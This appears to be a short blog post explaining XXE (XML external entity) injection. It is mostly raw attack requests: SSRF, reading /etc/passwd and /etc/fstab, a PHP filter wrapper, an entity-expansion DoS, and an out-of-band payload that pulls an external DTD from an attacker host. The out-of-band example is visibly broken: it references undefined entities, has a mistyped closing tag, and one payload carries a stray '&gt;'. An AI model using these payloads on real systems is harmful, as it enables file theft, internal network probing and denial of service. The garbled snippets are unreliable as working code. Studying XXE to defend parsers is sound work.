What are XXE vulnerabilities?

XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) happen if a web application or API accepts unsanitized XML data and its back-end XML parser is configured to allow external XML entity parsing. XXE vulnerabilities can let malicious hackers perform attacks such as server-side request forgery (SSRF), local file inclusion (LFI), directory traversal, remote code execution (RCE), network port scanning, and denial of service (DoS).

Example of XXE-based SSRF

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "http://192.168.0.1/secret.txt">
]>
<foo>
  &xxe;
</foo>

Example of XXE local data exfiltration

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "file:///etc/passwd">
]>
<foo>
  &xxe;
</foo>

Limitations and workarounds for exfiltrating XML data

POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "file:///etc/fstab"&gt;
]>
<foo>
  &bar;
</foo>

Using PHP protocol wrappers

POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar SYSTEM
  "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
  &bar;
</foo>

Example of an XXE DoS attack

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "World ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
  Hello &t3;
</foo>

What is OOB XXE?

Out-of-band XML external entity (OOB XXE) vulnerabilities are a type of XXE vulnerability where the attacker does not receive an immediate response to the XXE payload. The attack is conducted using one channel, such as a direct HTTP request, while the results (such as sensitive files) are received through another channel – often an HTTP server controlled by the attacker.

Example of OOB XXE

evil.dtd

<!ENTITY evil SYSTEM "file:///etc/hosts">

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
  <!ENTITY file SYSTEM
  "file:///etc/hosts">
  <!ENTITY % dtd SYSTEM
  "http://192.168.9.52:8787/ctf_train/php/evil.dtd">
   <!ENTITY bar SYSTEM
  "php://filter/read=convert.base64-encode/resource=/etc/fstab">
  %dtd;
  %all;
]>
<root>
  <user>
    &file;
    &fileContents;
  <user>
</root>

Andrew's Blog